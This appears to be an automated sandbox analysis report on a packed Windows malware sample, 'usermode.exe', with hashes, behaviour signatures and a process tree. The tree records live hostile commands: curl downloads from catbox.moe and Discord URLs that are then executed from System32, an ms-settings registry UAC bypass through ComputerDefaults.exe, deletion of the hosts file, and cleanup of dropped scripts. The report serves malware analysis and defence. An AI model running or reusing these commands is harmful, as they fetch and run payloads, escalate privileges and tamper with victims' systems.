Analysis

  • max time kernel
    20s
  • max time network
    22s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    30/10/2024, 13:56

General

  • Target

    usermode.exe

  • Size

    5.4MB

  • MD5

    fb4bf2834546449c2ce7593c9b152995

  • SHA1

    962351902ca2b130d5652e6b42bc7c5fdf8ab4d4

  • SHA256

    f63734e8c099081fb6f7386aaa960667e297a0b323d7b583d1a2cfcd974353dd

  • SHA512

    275d02f4871707f7b57b348f0a882abf98b3746bd7c5da80180d6b4a0cf67415ae0d3992b4b410235054f57c0a5c81216fd4a572d0a8e8059d2fe154fa72d2a8

  • SSDEEP

    98304:ApRYuEKLOdpy9owo8DQZpvSnHHQoCZ06i8ATTkPb7UzVC2wx7ETxZ:AsWOdpy9oX8oZti8UTmb7f2wx7El

Malware Config

Signatures

  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 22 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\usermode.exe
    "C:\Users\Admin\AppData\Local\Temp\usermode.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3908
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl "https://files.catbox.moe/zalgwe.bin" --output "C:\Windows\System32\secret.exe" >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4292
      • C:\Windows\system32\curl.exe
        curl "https://files.catbox.moe/zalgwe.bin" --output "C:\Windows\System32\secret.exe"
        3⤵
        • Drops file in System32 directory
        PID:2192
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\System32\secret.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3376
      • C:\Windows\System32\secret.exe
        C:\Windows\System32\secret.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3400
        • C:\Windows\system32\cmd.exe
          /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3740
          • C:\Windows\system32\reg.exe
            reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
            5⤵
              PID:3836
          • C:\Windows\system32\cmd.exe
            /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\542700.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2608
            • C:\Windows\system32\reg.exe
              reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\542700.vbs" /f
              5⤵
              • Modifies registry class
              PID:3788
            • C:\Windows\system32\reg.exe
              reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
              5⤵
              • Modifies registry class
              PID:2932
          • C:\Windows\system32\cmd.exe
            /c start /B ComputerDefaults.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4512
            • C:\Windows\system32\ComputerDefaults.exe
              ComputerDefaults.exe
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3756
              • C:\Windows\system32\wscript.exe
                "wscript.exe" C:\Users\Admin\AppData\Local\Temp\542700.vbs
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:436
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
                  7⤵
                    PID:1448
            • C:\Windows\system32\cmd.exe
              /c del /f C:\Users\Admin\AppData\Local\Temp\542700.vbs
              4⤵
                PID:1104
              • C:\Windows\system32\cmd.exe
                /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1688
                • C:\Windows\system32\reg.exe
                  reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                  5⤵
                  • Modifies registry class
                  PID:4816
              • C:\Windows\system32\cmd.exe
                /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1240
                • C:\Windows\system32\reg.exe
                  reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                  5⤵
                    PID:4508
                • C:\Windows\system32\cmd.exe
                  /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\168587.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2144
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\168587.vbs" /f
                    5⤵
                    • Modifies registry class
                    PID:4036
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                    5⤵
                    • Modifies registry class
                    PID:2584
                • C:\Windows\system32\cmd.exe
                  /c start /B ComputerDefaults.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3388
                  • C:\Windows\system32\ComputerDefaults.exe
                    ComputerDefaults.exe
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:892
                    • C:\Windows\system32\wscript.exe
                      "wscript.exe" C:\Users\Admin\AppData\Local\Temp\168587.vbs
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:392
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C start C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe jwah3vi8udplil4pnbtk5lm9cw9p1w:uBXGGIIoaOA3aw5m7pLMX006:matchashop.icu
                        7⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1524
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe
                          C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe jwah3vi8udplil4pnbtk5lm9cw9p1w:uBXGGIIoaOA3aw5m7pLMX006:matchashop.icu
                          8⤵
                          • Executes dropped EXE
                          PID:3052
                • C:\Windows\system32\cmd.exe
                  /c del /f C:\Users\Admin\AppData\Local\Temp\168587.vbs
                  4⤵
                    PID:1468
                  • C:\Windows\system32\cmd.exe
                    /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2004
                    • C:\Windows\system32\reg.exe
                      reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                      5⤵
                      • Modifies registry class
                      PID:2136
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c curl "https://cdn.discordapp.com/attachments/1263645426599596164/1293915367185580053/dukedennis.otf?ex=67091c17&is=6707ca97&hm=681743a411446d1716303f04ab6b576ca7b42f46779ab825121f40f4a198b70a" --output "C:\dukedennis.otf" >nul 2>&1
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1948
                • C:\Windows\system32\curl.exe
                  curl "https://cdn.discordapp.com/attachments/1263645426599596164/1293915367185580053/dukedennis.otf?ex=67091c17&is=6707ca97&hm=681743a411446d1716303f04ab6b576ca7b42f46779ab825121f40f4a198b70a" --output "C:\dukedennis.otf"
                  3⤵
                    PID:1488

              Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

                      Filesize

                      1KB

                      MD5

                      67e486b2f148a3fca863728242b6273e

                      SHA1

                      452a84c183d7ea5b7c015b597e94af8eef66d44a

                      SHA256

                      facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

                      SHA512

                      d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

                      Filesize

                      436B

                      MD5

                      971c514f84bba0785f80aa1c23edfd79

                      SHA1

                      732acea710a87530c6b08ecdf32a110d254a54c8

                      SHA256

                      f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

                      SHA512

                      43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

                      Filesize

                      174B

                      MD5

                      3bf53b7cb0ef14526332140e3f06e30e

                      SHA1

                      73684a2e322f714d3cf7396cc467f4b2fbe48c60

                      SHA256

                      63d7227e22957e115ece214bf46e427d95782e2ed7c5be04b43bad30a50d9014

                      SHA512

                      82728bb630791419f845e5a1a9a67b210fb4065f9603616aca1d9446d080028a0a64bed10d5e405f453e32fbf5d31fb020a9ec38ba9ca01e843c97fe437c3eee

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

                      Filesize

                      170B

                      MD5

                      bd34d3e89ca124297388a6e74ba69449

                      SHA1

                      54742685dfa4f520e2e93b2024629c91c925ccfb

                      SHA256

                      4173a607877121ad103b1018726634f0d28bf6ca7ac86be683f162a6abbacd7b

                      SHA512

                      700573da5a8fb38ee6fc9f92b45f33d2d2a0ac6610eb572ef0cb164c686164d5dbdf07e1012606f57cad64102b00fc443fa9c1031d517d0d7c9cf5ab8593eb2d

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe

                      Filesize

                      2.7MB

                      MD5

                      925efe96cdd4c38990ce77cf97f5218f

                      SHA1

                      6deeb34ba43549ac8a7d6b545257e6df64e29495

                      SHA256

                      c0f88af9fb0d75921f09ead45882adb82a2b1222d728de0f10ae8a875ee757a4

                      SHA512

                      3d7a24dea82a9908ed599680dbe1caeadbee5cb04aa06a4c6310ceccd8f98f8ca9f0666434d48945e44ec48c3f4ef21d3c23df4252b4d5792995a4b1892014d3

                    • C:\Users\Admin\AppData\Local\Temp\168587.vbs

                      Filesize

                      246B

                      MD5

                      0b4570ab9e0b9b3a1c729d2dfe4269cf

                      SHA1

                      d8f47021a2000ec2160cfceeb59654d28d3b7ba4

                      SHA256

                      d4aec27b2377d3267c10348eaacfaa97dbb2ca0c3f0f5170d905301a77ae0f9d

                      SHA512

                      0adf851c389281cbd1c28a6ac08691179dec2a536f1d68ce46a621e5d234dbb5cd826aaea2193a674e1396fdaa745f21fba9988cb2cb19736d0c153f3b86422e

                    • C:\Users\Admin\AppData\Local\Temp\542700.vbs

                      Filesize

                      125B

                      MD5

                      8b4ed5c47fdddbeba260ef11cfca88c6

                      SHA1

                      868f11f8ed78ebe871f9da182d053f349834b017

                      SHA256

                      170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5

                      SHA512

                      87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf

                    • C:\Windows\System32\secret.exe

                      Filesize

                      228KB

                      MD5

                      68487b48506703ac72bf48e57a5f6ffa

                      SHA1

                      7eb5a51f8ecead1e555d79db58bb43e61264b51b

                      SHA256

                      f3ecc9924b3a625fcc54d59008706e41c830c6952bf836e77352a340251c8cae

                      SHA512

                      033f745e1c289ad4cd69b1494962fd6260484cb300c7556d76635908dbc5f54e626b5c21e130058c5d84b5978eff3628dd6fd8b56e35bf37c0a6f866ffb8cbb0

                    • memory/3400-16-0x000001F6A1D40000-0x000001F6A1D41000-memory.dmp

                      Filesize

                      4KB

                    • memory/3400-12-0x000001F6A1D20000-0x000001F6A1D21000-memory.dmp

                      Filesize

                      4KB

                    • memory/3400-11-0x000001F6A0410000-0x000001F6A0411000-memory.dmp

                      Filesize

                      4KB

                    • memory/3400-10-0x000001F6A0400000-0x000001F6A0401000-memory.dmp

                      Filesize

                      4KB

                    • memory/3908-14-0x00007FF7BA1B7000-0x00007FF7BA518000-memory.dmp

                      Filesize

                      3.4MB

                    • memory/3908-15-0x00007FF7BA160000-0x00007FF7BAA79000-memory.dmp

                      Filesize

                      9.1MB

                    • memory/3908-0-0x00007FF7BA1B7000-0x00007FF7BA518000-memory.dmp

                      Filesize

                      3.4MB

                    • memory/3908-5-0x00007FF7BA160000-0x00007FF7BAA79000-memory.dmp

                      Filesize

                      9.1MB

                    • memory/3908-2-0x00007FF7BA160000-0x00007FF7BAA79000-memory.dmp

                      Filesize

                      9.1MB

                    • memory/3908-1-0x00007FF8E1A70000-0x00007FF8E1A72000-memory.dmp

                      Filesize

                      8KB